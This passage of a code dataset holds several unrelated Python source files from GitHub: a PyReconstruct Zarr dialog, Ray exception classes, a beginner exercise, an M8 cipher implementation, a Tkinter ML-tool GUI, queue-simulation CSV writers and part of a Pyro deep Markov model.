+{"seq_id":"6649514042","text":"from PySide6.QtWidgets import (\n QWidget, \n QDialog, \n QDialogButtonBox, \n QHBoxLayout, \n QLabel, \n QLineEdit,\n QVBoxLayout, \n QComboBox, \n QPushButton\n)\n\nfrom .helper import resizeLineEdit\n\nfrom PyReconstruct.modules.datatypes import Series\nfrom PyReconstruct.modules.gui.utils import notify\n\nclass CreateZarrDialog(QDialog):\n\n def __init__(self, parent : QWidget, series : Series):\n \"\"\"Create a zarr dialog.\n \n Params:\n parent (QWidget): the parent widget\n series (Series): the series\n \"\"\"\n self.series = series\n\n super().__init__(parent)\n\n self.setWindowTitle(\"Create Zarr\")\n\n vlayout = QVBoxLayout()\n vlayout.setSpacing(10)\n\n # get the border object\n bobj_row = QHBoxLayout()\n bobj_text = QLabel(self, text=\"Border object:\")\n self.bobj_input = QLineEdit(self)\n resizeLineEdit(self.bobj_input, \"X\"*15)\n bobj_row.addWidget(bobj_text)\n bobj_row.addWidget(self.bobj_input)\n vlayout.addLayout(bobj_row)\n\n # get the section range\n sections = sorted(list(series.sections.keys()))\n srange_row = QHBoxLayout()\n srange_text1 = QLabel(self, text=\"From section\")\n self.srange_input1 = QLineEdit(self)\n self.srange_input1.setText(str(sections[0]))\n resizeLineEdit(self.srange_input1, \"0000\")\n srange_text2 = QLabel(self, text=\"to\")\n self.srange_input2 = QLineEdit(self)\n self.srange_input2.setText(str(sections[-1]))\n resizeLineEdit(self.srange_input2, \"0000\")\n srange_row.addWidget(srange_text1)\n srange_row.addWidget(self.srange_input1)\n srange_row.addWidget(srange_text2)\n srange_row.addWidget(self.srange_input2)\n vlayout.addLayout(srange_row)\n\n # get the magnification\n mag_row = QHBoxLayout()\n mag_text = QLabel(self, text=\"Magnification (µm/pix):\")\n self.mag_input = QLineEdit(self)\n resizeLineEdit(self.mag_input, \"0\"*10)\n self.mag_input.setText(\n str(self.series.data[\"sections\"][self.series.current_section][\"mag\"])\n )\n mag_row.addWidget(mag_text)\n mag_row.addWidget(self.mag_input)\n vlayout.addLayout(mag_row)\n\n QBtn = QDialogButtonBox.Ok | QDialogButtonBox.Cancel\n buttonbox = QDialogButtonBox(QBtn)\n buttonbox.accepted.connect(self.accept)\n buttonbox.rejected.connect(self.reject)\n\n vlayout.addSpacing(10)\n vlayout.addWidget(buttonbox)\n\n self.setLayout(vlayout)\n \n def accept(self):\n \"\"\"Overwritten from QDialog.\"\"\" \n # check that border object is valid\n bobj = self.bobj_input.text()\n if bobj not in self.series.data[\"objects\"]:\n notify(\"Border object not in series.\")\n return\n \n # check for valid section numbers\n srange = (\n self.srange_input1.text(),\n self.srange_input2.text()\n )\n for s in srange:\n if not s.isnumeric() or int(s) not in self.series.sections:\n 
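# note: str.isnumeric() is False for strings like \"-5\" or \"4.0\", so this
 # branch also catches negative and non-integer inputs before int(s) is
 # evaluated\n 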
notify(\"Please enter a valid section number.\")\n return\n if int(srange[0]) >= int(srange[1]):\n notify(\"Please enter a valid section range.\")\n return\n \n # check for valid mag\n mag = self.mag_input.text()\n if not mag.replace(\".\", \"\", 1).isnumeric():\n notify(\"Please enter a valid magnification.\")\n return\n \n super().accept() \n\n def exec(self):\n \"\"\"Run the dialog.\"\"\"\n confirmed = super().exec()\n if confirmed:\n\n border_obj = self.bobj_input.text()\n\n srange = (\n int(self.srange_input1.text()),\n int(self.srange_input2.text()) + 1\n )\n\n mag = float(self.mag_input.text())\n\n return (border_obj, srange, mag), True\n \n else:\n return None, False\n","repo_name":"SynapseWeb/PyReconstruct","sub_path":"PyReconstruct/modules/gui/dialog/create_zarr.py","file_name":"create_zarr.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"35764314780","text":"import os\n\nimport colorama\n\nimport ray\nimport setproctitle\n\n\nclass RayError(Exception):\n \"\"\"Super class of all ray exception types.\"\"\"\n pass\n\n\nclass RayConnectionError(RayError):\n \"\"\"Raised when ray is not yet connected but needs to be.\"\"\"\n pass\n\n\nclass RayCancellationError(RayError):\n \"\"\"Raised when this task is cancelled.\n\n Attributes:\n task_id (TaskID): The TaskID of the function that was directly\n cancelled.\n \"\"\"\n\n def __init__(self, task_id=None):\n self.task_id = task_id\n\n def __str__(self):\n if self.task_id is None:\n return \"This task or its dependency was cancelled by\"\n return \"Task: \" + str(self.task_id) + \" was cancelled\"\n\n\nclass RayTaskError(RayError):\n \"\"\"Indicates that a task threw an exception during execution.\n\n If a task throws an exception during execution, a RayTaskError is stored in\n the object store for each of the task's outputs. 
When an object is\n retrieved from the object store, the Python method that retrieved it checks\n to see if the object is a RayTaskError and if it is then an exception is\n thrown propagating the error message.\n\n Attributes:\n function_name (str): The name of the function that failed and produced\n the RayTaskError.\n traceback_str (str): The traceback from the exception.\n \"\"\"\n\n def __init__(self,\n function_name,\n traceback_str,\n cause_cls,\n proctitle=None,\n pid=None,\n ip=None):\n \"\"\"Initialize a RayTaskError.\"\"\"\n if proctitle:\n self.proctitle = proctitle\n else:\n self.proctitle = setproctitle.getproctitle()\n self.pid = pid or os.getpid()\n self.ip = ip or ray.services.get_node_ip_address()\n self.function_name = function_name\n self.traceback_str = traceback_str\n self.cause_cls = cause_cls\n assert traceback_str is not None\n\n def as_instanceof_cause(self):\n \"\"\"Returns copy that is an instance of the cause's Python class.\n\n The returned exception will inherit from both RayTaskError and the\n cause class.\n \"\"\"\n\n if issubclass(RayTaskError, self.cause_cls):\n return self # already satisfied\n\n if issubclass(self.cause_cls, RayError):\n return self # don't try to wrap ray internal errors\n\n class cls(RayTaskError, self.cause_cls):\n def __init__(self, function_name, traceback_str, cause_cls,\n proctitle, pid, ip):\n RayTaskError.__init__(self, function_name, traceback_str,\n cause_cls, proctitle, pid, ip)\n\n name = \"RayTaskError({})\".format(self.cause_cls.__name__)\n cls.__name__ = name\n cls.__qualname__ = name\n\n return cls(self.function_name, self.traceback_str, self.cause_cls,\n self.proctitle, self.pid, self.ip)\n\n def __str__(self):\n \"\"\"Format a RayTaskError as a string.\"\"\"\n lines = self.traceback_str.strip().split(\"\\n\")\n out = []\n in_worker = False\n for line in lines:\n if line.startswith(\"Traceback \"):\n out.append(\"{}{}{} (pid={}, ip={})\".format(\n colorama.Fore.CYAN, self.proctitle, colorama.Fore.RESET,\n self.pid, self.ip))\n elif in_worker:\n in_worker = False\n elif \"ray/worker.py\" in line or \"ray/function_manager.py\" in line:\n in_worker = True\n else:\n out.append(line)\n return \"\\n\".join(out)\n\n\nclass RayWorkerError(RayError):\n \"\"\"Indicates that the worker died unexpectedly while executing a task.\"\"\"\n\n def __str__(self):\n return \"The worker died unexpectedly while executing this task.\"\n\n\nclass RayActorError(RayError):\n \"\"\"Indicates that the actor died unexpectedly before finishing a task.\n\n This exception could happen either because the actor process dies while\n executing a task, or because a task is submitted to a dead actor.\n \"\"\"\n\n def __str__(self):\n return \"The actor died unexpectedly before finishing this task.\"\n\n\nclass RayletError(RayError):\n \"\"\"Indicates that the Raylet client has errored.\n\n This exception can be thrown when the raylet is killed.\n \"\"\"\n\n def __init__(self, client_exc):\n self.client_exc = client_exc\n\n def __str__(self):\n return \"The Raylet died with this message: {}\".format(self.client_exc)\n\n\nclass ObjectStoreFullError(RayError):\n \"\"\"Indicates that the object store is full.\n\n This is raised if the attempt to store the object fails\n because the object store is full even after multiple retries.\n \"\"\"\n\n def __str__(self):\n return super(ObjectStoreFullError, self).__str__() + (\n \"\\n\"\n \"The local object store is full of objects that are still in scope\"\n \" and cannot be evicted. 
Try increasing the object store memory \"\n \"available with ray.init(object_store_memory=<bytes>). \"\n \"You can also try setting an option to fallback to LRU eviction \"\n \"when the object store is full by calling \"\n \"ray.init(lru_evict=True). See also: \"\n \"https://docs.ray.io/en/latest/memory-management.html.\")\n\n\nclass UnreconstructableError(RayError):\n \"\"\"Indicates that an object is lost and cannot be reconstructed.\n\n Note, this exception only happens for actor objects. If actor's current\n state is after object's creating task, the actor cannot re-run the task to\n reconstruct the object.\n\n Attributes:\n object_id: ID of the object.\n \"\"\"\n\n def __init__(self, object_id):\n self.object_id = object_id\n\n def __str__(self):\n return (\n \"Object {} is lost (either LRU evicted or deleted by user) and \"\n \"cannot be reconstructed. Try increasing the object store \"\n \"memory available with ray.init(object_store_memory=<bytes>) \"\n \"or setting object store limits with \"\n \"ray.remote(object_store_memory=<bytes>). See also: {}\".format(\n self.object_id.hex(),\n \"https://docs.ray.io/en/latest/memory-management.html\"))\n\n\nclass RayTimeoutError(RayError):\n \"\"\"Indicates that a call to the worker timed out.\"\"\"\n pass\n\n\nclass PlasmaObjectNotAvailable(RayError):\n \"\"\"Called when an object was not available within the given timeout.\"\"\"\n pass\n\n\nRAY_EXCEPTION_TYPES = [\n PlasmaObjectNotAvailable,\n RayError,\n RayTaskError,\n RayWorkerError,\n RayActorError,\n ObjectStoreFullError,\n UnreconstructableError,\n RayTimeoutError,\n]\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"third_party/ray/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"}
+{"seq_id":"3180643370","text":"from math import inf\r\n\r\nl = []\r\n\r\nme = inf\r\nma = -inf\r\n\r\nfor c in range(0,5):\r\n n = int(input(f\"Enter a value for position {c}: \"))\r\n l.append(n)\r\n if ma <= n:\r\n ma = n\r\n\r\n if me >= n:\r\n me = n\r\n\r\nprint(\"-=\"*14)\r\n\r\nprint(f\"You entered the values: {l}\")\r\nprint(f\"The largest value entered was {ma} at positions \", end='')\r\nfor c in range(0,5):\r\n if l[c] == ma:\r\n print(f\"{c}... \",end='')\r\nprint()\r\nprint(f\"The smallest value entered was {me} at positions \", end='')\r\nfor c in range(0,5):\r\n if l[c] == me:\r\n print(f\"{c}... 
\",end='')\r\nprint()","repo_name":"ChrisArthLisboa/projects","sub_path":"Python/m3/a17/ex78.py","file_name":"ex78.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1395207044","text":"M = 0xffffffff\n\n\ndef add(x, y):\n return (x + y) & M\n\n\ndef xor(x, y):\n return x ^ y\n\n\ndef rol(x, s):\n return ((x << s) | (x >> (32 - s))) & M\n\n\ndef m8_round(L, R, ri, k, adk, aek):\n \"\"\"\n One round of the algorithm.\n\n L, R: input\n ri: round index\n k: 256-bit execution key\n adk: 24-bit algorithm decision key\n aek: 96-bit algorithm expansion key\n \"\"\"\n\n op = [[add, xor][(adk >> (23 - i)) & 1] for i in range(9)]\n S1 = (adk >> 10) & 0x1f\n S2 = (adk >> 5) & 0x1f\n S3 = (adk >> 0) & 0x1f\n A = (aek >> 64) & M\n B = (aek >> 32) & M\n C = (aek >> 0) & M\n KR = (k >> (32 + 64 * (3 - ri % 4))) & M\n KL = (k >> (0 + 64 * (3 - ri % 4))) & M\n\n x = op[0](L, KL)\n y = op[2](op[1](rol(x, S1), x), A)\n z = op[5](op[4](op[3](rol(y, S2), y), B), KR)\n return op[8](op[7](op[6](rol(z, S3), z), C), R), L\n\n\ndef m8_keyexpand(dk, kek, adks, aeks):\n \"\"\"\n Key expansion.\n\n dk: 64-bit data key\n kek: 256-bit key expansion key\n adks: algorithm decision keys\n aeks: algorithm expansion keys\n \"\"\"\n\n L = (dk >> 32) & M\n R = (dk >> 0) & M\n k = 0\n for i in range(8):\n L, R = m8_round(L, R, i, kek, adks[i], aeks[i])\n k |= (L << (32 * (7 - i)))\n return k\n\n\ndef m8_encrypt(data, N, dk, kek, adks, aeks):\n \"\"\"\n Encrypt one block with M8.\n\n data: 64-bit input block\n N: number of rounds (must be >= 8)\n dk: 64-bit data key\n kek: 256-bit key expansion key\n adks: a list of N 24-bit algorithm decision keys\n aeks: a list of N 96-bit algorithm expansion keys\n \"\"\"\n\n ek = m8_keyexpand(dk, kek, adks, aeks)\n L = (data >> 32) & M\n R = (data >> 0) & M\n for i in range(N):\n L, R = m8_round(L, R, i, ek, adks[i], aeks[i])\n return (L << 32) | R\n","repo_name":"Euclidophren/fingercipher","sub_path":"encryption/block/m/m8.py","file_name":"m8.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26578177445","text":"from tkinter import filedialog\r\nfrom tkinter import * \r\nfrom tkinter.ttk import *\r\nimport tkinter.messagebox\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport matplotlib\r\nimport loading\r\n\r\n\r\nclass PARAM:\r\n\r\n \r\n def __init__(self, master):\r\n \r\n \r\n \r\n self.my_var = IntVar()\r\n self.valuesdata6 = StringVar()\r\n self.valuesdata3 = StringVar()\r\n self.valuesdata4 = StringVar()\r\n self.valuesdata5 = StringVar()\r\n self.file = open('temp.txt','w') \r\n \r\n ttk.Style().configure('green/black.TLabel', foreground='#000040', background='#8080ff')\r\n ttk.Style().configure('gb.TLabel', foreground='#000040', background='#dbdbdb')\r\n ttk.Style().configure('green/black.TButton', foreground='#000040', background='black')\r\n \r\n self.master = master\r\n self.master.title(\" MACHINE LEARNING BASED CLASSIFICATION TOOL \")\r\n self.master.config(bg=\"#dbdbdb\")\r\n self.master.geometry(\"800x680\")\r\n self.can = Canvas(master, width=800, height=100, bg='#8080ff')\r\n \r\n self.can.place(x=1, y=1)\r\n\r\n self.l = ttk.Label(master, text=\"MACHINE LEARNING BASED CLASSIFICATION TOOL \",\r\n font=('times new roman', 15, 'bold italic'),style='green/black.TLabel')\r\n self.l.place(x=175, y=30)\r\n \r\n \r\n \r\n self.e3 = ttk.Label(master,text=\"Select The 
Algorithm\",style=\"gb.TLabel\")\r\n self.e3.place(x=350, y=130, width=880)\r\n \r\n self.rb1 = ttk.Radiobutton(master, text='Artificial Neural Network', variable=self.my_var, value=5, command=self.selected)\r\n self.rb1.place(x=200, y=180)\r\n self.rb2 = ttk.Radiobutton(master, text='Convolutional Neural Network', variable=self.my_var, value=10, command=self.selected)\r\n self.rb2.place(x=420, y=180)\r\n \r\n \r\n self.e5 = ttk.Label(master,textvariable=self.valuesdata6,style='gb.TLabel')\r\n self.e5.place(x=235, y=255, width=350)\r\n \r\n self.e6 = ttk.Label(master,textvariable=self.valuesdata3,style='gb.TLabel')\r\n self.e6.place(x=235, y=335, width=350)\r\n \r\n self.e7 = ttk.Label(master,textvariable=self.valuesdata4,style='gb.TLabel')\r\n self.e7.place(x=235, y=385, width=350)\r\n \r\n self.e8 = ttk.Label(master,textvariable=self.valuesdata5,style='gb.TLabel')\r\n self.e8.place(x=235, y=435, width=350)\r\n \r\n \r\n \r\n self.x1 =Entry(master)\r\n self.x1.place(x=485, y=335, width=80)\r\n \r\n \r\n \r\n self.x2 =Entry(master)\r\n self.x2.place(x=485, y=385, width=80)\r\n \r\n \r\n self.x3 =Entry(master)\r\n self.x3.place(x=485, y=435, width=80)\r\n \r\n self.b5 = ttk.Button(master, text='Load Data', cursor=\"plus\", style='green/black.TButton', command=self.loadwindow)\r\n self.b5.place(x=50, y=580, width=110)\r\n \r\n \r\n \r\n self.x =Entry(master,style='gb.TLabel' )\r\n self.x.place(x=485, y=335, width=80,height=100)\r\n self.x.lift()\r\n \r\n self.xx =Entry(master,style='gb.TLabel')\r\n self.xx.place(x=485, y=435, width=80,height=50)\r\n self.xx.lift()\r\n \r\n \r\n def selected(self):\r\n if self.my_var.get()==5:\r\n self.valuesdata6.set(\"Define Parameters For Artificial Neural Network Classifier\")\r\n self.valuesdata3.set(\"Enter Number Of Training Cycles\")\r\n self.valuesdata4.set(\"Enter Number Of Training Classes\")\r\n self.valuesdata5.set(\"Enter Number Of Hidden Neurons\")\r\n self.x.lower()\r\n self.xx.lower()\r\n self.x1.delete(0,END)\r\n self.x2.delete(0,END)\r\n self.x3.delete(0,END)\r\n \r\n \r\n \r\n elif self.my_var.get()==10:\r\n self.valuesdata6.set(\"Define Parameters For Convolutional Neural Network Classifier\")\r\n self.valuesdata3.set(\"Enter Number Of Training Cycles\")\r\n self.valuesdata4.set(\"Enter Number Of Training Classes\")\r\n self.valuesdata5.set(\"\")\r\n self.x.lower()\r\n self.xx.lift()\r\n self.x1.delete(0,END)\r\n self.x2.delete(0,END)\r\n self.x3.delete(0,END)\r\n \r\n \r\n else:\r\n self.valuesdata6.set(\"ERROR:Report the Bug\")\r\n \r\n \r\n \r\n \r\n def loadwindow(self):\r\n end='//null//'\r\n self.file.write('epoch:'+self.x1.get()+end)\r\n self.file.write('cls:'+self.x2.get()+end)\r\n if self.my_var.get()==5:\r\n self.file.write('neuron:'+self.x3.get()+end)\r\n else:\r\n self.file.write('neuron:'+'-999'+end)\r\n self.file.close()\r\n \r\n self.master.destroy()\r\n root3 = Tk()\r\n root3.resizable(0, 0)\r\n self.obj3 = loading.REG(root3)\r\n root3.mainloop()\r\n \r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n root = Tk()\r\n root.resizable(0, 0)\r\n obj = PARAM(root)\r\n root.mainloop()\r\n \r\n ","repo_name":"rahul-12345/ANN_CNN_FINAL_PROJECT1","sub_path":"ANNCNN/classifier_tool/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10668379416","text":"import csv\n\n\nclass QueueDataCSV:\n\n def __init__(self, path):\n self.path = path\n self.csv_file = None\n self.fieldnames = \\\n [\"MemberID\", 
\"ArrivedInQueue\", \"ExpectedWait\", \"ExpectedService\", \"WaitInQueue\", \"ArrivedInClass\",\n \"TimeInClass\", \"LeftClass\", \"TotalService\", \"Level\", \"ImmigrantClass\"]\n self.writer = None\n self.start()\n\n def start(self):\n self.csv_file = open(self.path, 'wb')\n self.writer = csv.DictWriter(self.csv_file, fieldnames=self.fieldnames)\n self.writer.writeheader()\n\n def write(self, member_id, arrived_queue, exp_wait, exp_service, waited, arrived_class, class_time, left_class, service_total, level, imm_class):\n self.writer.writerow({\"MemberID\": member_id, \"ArrivedInQueue\": arrived_queue, \"ExpectedWait\": exp_wait, \"ExpectedService\": exp_service, \"WaitInQueue\": waited,\n \"ArrivedInClass\":arrived_class, \"TimeInClass\": class_time, \"LeftClass\": left_class,\n \"TotalService\": service_total, \"Level\": level, \"ImmigrantClass\": imm_class})\n\n def close(self):\n self.csv_file.close()\n\n\nclass QueueWeeklyCSV:\n def __init__(self, path, fieldnames):\n self.path = path\n self.csv_file = None\n self.fieldnames = []\n self.writer = None\n self.start(fieldnames)\n\n def start(self, fieldnames):\n self.fieldnames = fieldnames\n self.csv_file = open(self.path, 'wb')\n self.writer = csv.DictWriter(self.csv_file, fieldnames=self.fieldnames)\n self.writer.writeheader()\n\n def write(self, queue, week): # Pass in queue array\n queue_dict = {\"week\": week}\n for f in self.fieldnames:\n if f != \"week\":\n index = self.fieldnames.index(f) - 1\n queue_dict[f] = queue[index]\n self.writer.writerow(queue_dict)\n\n def close(self):\n self.csv_file.close()\n","repo_name":"ismael-martinez/QueueingNetworkProject","sub_path":"QueueingSimulationCode/CSV.py","file_name":"CSV.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20783605319","text":"import argparse\nimport time\nimport os\nfrom os.path import exists\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import pad_sequence\n\nimport pyro\nimport pyro.distributions as dist\nimport pyro.poutine as poutine\nfrom pyro.distributions import TransformedDistribution\nfrom pyro.distributions.transforms import affine_autoregressive\nfrom pyro.infer import SVI, JitTrace_ELBO, Trace_ELBO, TraceEnum_ELBO, TraceTMC_ELBO, config_enumerate\nfrom pyro.optim import ClippedAdam\n\nclass Emitter(nn.Module):\n \"\"\"\n Parameterizes the Gaussian observation likelihood `p(x_t | z_t)`\n \"\"\"\n def __init__(self, input_dim, z_dim, emission_dim, use_feature_mask_emitter, min_x_scale):\n super().__init__()\n self.min_x_scale = min_x_scale\n # initialize the six linear transformations used in the neural network\n self.lin_gate_z_to_hidden = nn.Linear(z_dim+use_feature_mask_emitter*input_dim, emission_dim)\n self.lin_gate_hidden_to_input = nn.Linear(emission_dim, input_dim)\n self.lin_proposed_mean_z_to_hidden = nn.Linear(z_dim+use_feature_mask_emitter*input_dim, emission_dim)\n self.lin_proposed_mean_hidden_to_input = nn.Linear(emission_dim, input_dim)\n self.lin_sig = nn.Linear(input_dim, input_dim)\n self.lin_z_to_loc = nn.Linear(z_dim+use_feature_mask_emitter*input_dim, input_dim)\n\n self.relu = nn.ReLU()\n self.softplus = nn.Softplus()\n\n def forward(self, z_t, mini_batch_feature_mask_t=None):\n \"\"\"\n Given the latent `z_{t-1}` corresponding to the time step t-1\n we return the mean and scale vectors that parameterize the\n (diagonal) gaussian distribution `p(x_t | z_t)`\n \"\"\"\n if 
mini_batch_feature_mask_t is None:\n # compute the gating function\n _gate = self.relu(self.lin_gate_z_to_hidden(z_t))\n gate = torch.sigmoid(self.lin_gate_hidden_to_input(_gate))\n # compute the 'proposed mean'\n _proposed_mean = self.relu(self.lin_proposed_mean_z_to_hidden(z_t))\n proposed_mean = self.lin_proposed_mean_hidden_to_input(_proposed_mean)\n # assemble the actual mean used to sample z_t, which mixes a linear transformation\n # of z_{t-1} with the proposed mean modulated by the gating function\n loc = (1 - gate) * self.lin_z_to_loc(z_t) + gate * proposed_mean\n else:\n # compute the gating function\n _gate = self.relu(self.lin_gate_z_to_hidden(torch.cat((z_t, mini_batch_feature_mask_t),dim=-1)))\n gate = torch.sigmoid(self.lin_gate_hidden_to_input(_gate))\n # compute the 'proposed mean'\n _proposed_mean = self.relu(self.lin_proposed_mean_z_to_hidden(torch.cat((z_t, mini_batch_feature_mask_t),dim=-1)))\n proposed_mean = self.lin_proposed_mean_hidden_to_input(_proposed_mean)\n # assemble the actual mean used to sample z_t, which mixes a linear transformation\n # of z_{t-1} with the proposed mean modulated by the gating function\n loc = (1 - gate) * self.lin_z_to_loc(torch.cat((z_t, mini_batch_feature_mask_t),dim=-1)) + gate * proposed_mean\n # compute the scale used to sample z_t, using the proposed mean from\n # above as input the softplus ensures that scale is positive\n scale = self.softplus(self.lin_sig(self.relu(proposed_mean)))\n # add the constant scale to ensure pdf will be upper-bounded\n scale = scale.add(self.min_x_scale)\n # return loc, scale which can be fed into Normal\n return loc, scale\n\nclass GatedTransition(nn.Module):\n \"\"\"\n Parameterizes the gaussian latent transition probability `p(z_t | z_{t-1} ,s)`\n \"\"\"\n\n def __init__(self, z_dim, static_dim, transition_dim):\n super().__init__()\n # initialize the six linear transformations used in the neural network\n self.concat_dim = z_dim + static_dim\n self.lin_gate_z_to_hidden = nn.Linear(self.concat_dim, transition_dim)\n self.lin_gate_hidden_to_z = nn.Linear(transition_dim, z_dim)\n self.lin_proposed_mean_z_to_hidden = nn.Linear(self.concat_dim, transition_dim)\n self.lin_proposed_mean_hidden_to_z = nn.Linear(transition_dim, z_dim)\n self.lin_sig = nn.Linear(z_dim, z_dim)\n self.lin_z_to_loc = nn.Linear(z_dim, z_dim)\n # modify the default initialization of lin_z_to_loc\n # so that it's starts out as the identity function\n self.lin_z_to_loc.weight.data = torch.eye(z_dim)\n self.lin_z_to_loc.bias.data = torch.zeros(z_dim)\n # initialize the three non-linearities used in the neural network\n self.relu = nn.ReLU()\n self.softplus = nn.Softplus()\n\n def forward(self, z_t_1, mini_batch_static):\n \"\"\"\n Given the latent `z_{t-1} and s` corresponding to the time step t-1\n we return the mean and scale vectors that parameterize the\n (diagonal) gaussian distribution `p(z_t | z_{t-1}, s)`\n \"\"\"\n # compute the gating function\n concat = torch.cat((z_t_1, mini_batch_static),dim=1)\n _gate = self.relu(self.lin_gate_z_to_hidden(concat))\n gate = torch.sigmoid(self.lin_gate_hidden_to_z(_gate))\n # compute the 'proposed mean'\n _proposed_mean = self.relu(self.lin_proposed_mean_z_to_hidden(concat))\n proposed_mean = self.lin_proposed_mean_hidden_to_z(_proposed_mean)\n # assemble the actual mean used to sample z_t, which mixes a linear transformation\n # of z_{t-1} with the proposed mean modulated by the gating function\n loc = (1 - gate) * self.lin_z_to_loc(z_t_1) + gate * proposed_mean\n # compute the scale 
used to sample z_t, using the proposed mean from\n # above as input the softplus ensures that scale is positive\n scale = self.softplus(self.lin_sig(self.relu(proposed_mean)))\n # return loc, scale which can be fed into Normal\n return loc, scale\n\nclass Combiner(nn.Module):\n \"\"\"\n Parameterizes `q(z_t | z_{t-1}, x_{t:T}, m{t:T}, s)`, which is the basic building block\n of the guide (i.e. the variational distribution). The dependence on `x_{t:T} and m_{t:T}` is\n through the hidden state of the RNN (see the PyTorch module `rnn` below)\n \"\"\"\n\n def __init__(self, z_dim, static_dim, rnn_dim):\n super().__init__()\n # initialize the three linear transformations used in the neural network\n self.concat_dim = z_dim + static_dim\n self.lin_z_to_hidden = nn.Linear(self.concat_dim , rnn_dim)\n self.lin_hidden_to_loc = nn.Linear(rnn_dim, z_dim)\n self.lin_hidden_to_scale = nn.Linear(rnn_dim, z_dim)\n # initialize the two non-linearities used in the neural network\n self.tanh = nn.Tanh()\n self.softplus = nn.Softplus()\n\n def forward(self, z_t_1, mini_batch_static, h_rnn):\n \"\"\"\n parameterize the (diagonal) gaussian distribution `q(z_t | z_{t-1}, x_{t:T}, m{t:T}, s)`\n \"\"\"\n # combine the rnn hidden state with a transformed version of z_t_1\n concat = torch.cat((z_t_1, mini_batch_static),dim=1)\n h_combined = 0.5 * (self.tanh(self.lin_z_to_hidden(concat)) + h_rnn)\n # use the combined hidden state to compute the mean used to sample z_t\n loc = self.lin_hidden_to_loc(h_combined)\n # use the combined hidden state to compute the scale used to sample z_t\n scale = self.softplus(self.lin_hidden_to_scale(h_combined))\n # return loc, scale which can be fed into Normal\n return loc, scale\n\n\nclass Predicter_Attention(nn.Module):\n \"\"\"\n Parameterizes the bernoulli observation likelihood `p(y | z_{1:T})`\n \"\"\"\n def __init__(self, z_dim, att_dim, MLP_dims, batch_first=True, use_cuda=True):\n super(Predicter_Attention, self).__init__() \n self.z_dim = z_dim\n self.att_dim = att_dim\n self.MLP_dims = MLP_dims\n\n #Context vector is a parameter to measure the relevance of provided vector for y prediction\n bound = np.sqrt(att_dim)\n self.context_vec = nn.Parameter(torch.zeros(att_dim, 1).uniform_(-bound, bound))\n #In attention framework, z_t's will be projected first\n self.projection_layer = nn.Linear(z_dim, att_dim)\n #There will be an activation function after projection\n self.tanh = nn.Tanh()\n #We use Beta Parameter to control sharpness/smoothness of Softmax function\n self.Beta = torch.Tensor([0.1]).cuda()\n #self.Beta = nn.Parameter(torch.ones(1))\n\n\n #We accepts MLP_dims as strings i.e. 
\"48-24-12-...\"\n #If MLP_dims is \"-\", it implies that there will be no middle layer\n if MLP_dims == \"-\":\n middle_layers = []\n else:\n middle_layers = MLP_dims.split(\"-\")\n all_MLP_dimensions = [z_dim]\n #all_MLP_dimensions = [z_dim]\n for i in middle_layers:\n all_MLP_dimensions.append(int(i))\n #Last dim will be 1 for binary classification\n all_MLP_dimensions.append(1)\n self.lin_layers_nn = nn.ModuleList()\n for i in range(len(all_MLP_dimensions)-1):\n self.lin_layers_nn.append(nn.Linear(all_MLP_dimensions[i], all_MLP_dimensions[i+1]))\n\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, z, mini_batch_mask):\n #Note: z here has the shape of (N,T,z_dim)\n z_2d = z.reshape(-1, z.shape[2])\n z_projected = self.tanh(self.projection_layer(z_2d)) #Now z_projected has the shape (N*T, att_dim)\n\n #Calculate weights (alpha) of z_projected\n #Below line is used originally (1)\n #alpha = self.Beta * torch.mm(z_projected, self.context_vec) #shape of alpha = (N*T,1)\n\n #Below block (2) is used instead of (1) to test cosine similarity\n cos = nn.CosineSimilarity(dim=1, eps=1e-6)\n alpha = cos(self.context_vec.squeeze(-1).expand(len(z_projected), len(self.context_vec)), z_projected)\n alpha = self.Beta * alpha\n\n alpha = alpha.reshape(z.shape[0], z.shape[1]) #shape of alpha = (N,T)\n alpha = alpha.masked_fill(mini_batch_mask == 0, -1e9)\n alpha = torch.softmax(alpha, dim=-1) #shape of alpha = (N,T)\n\n alpha = alpha.unsqueeze(-1).expand((alpha.shape + (z.shape[2],))) #shape of alpha = (N,T, z_dim)\n #alpha = alpha.unsqueeze(-1).expand((alpha.shape + (self.att_dim,))) #shape of alpha = (N,T, att_dim)\n\n #Multiply z and alpha elementwise\n new_z = z * alpha #shape of new_z = (N,T, z_dim)\n #new_z = z_projected.reshape(z.shape[0], z.shape[1],-1) * alpha\n new_z = new_z.sum(axis=1) #shape of new_z = (N, z_dim)\n\n\n\n input_MLP = new_z\n for i in range(len(self.lin_layers_nn)-1):\n input_MLP = self.relu(self.lin_layers_nn[i](input_MLP))\n\n prob_out = self.sigmoid(self.lin_layers_nn[-1](input_MLP))\n return prob_out.flatten()\n\n# this function takes a torch mini-batch and reverses each sequence\n# (w.r.t. the temporal axis, i.e. 
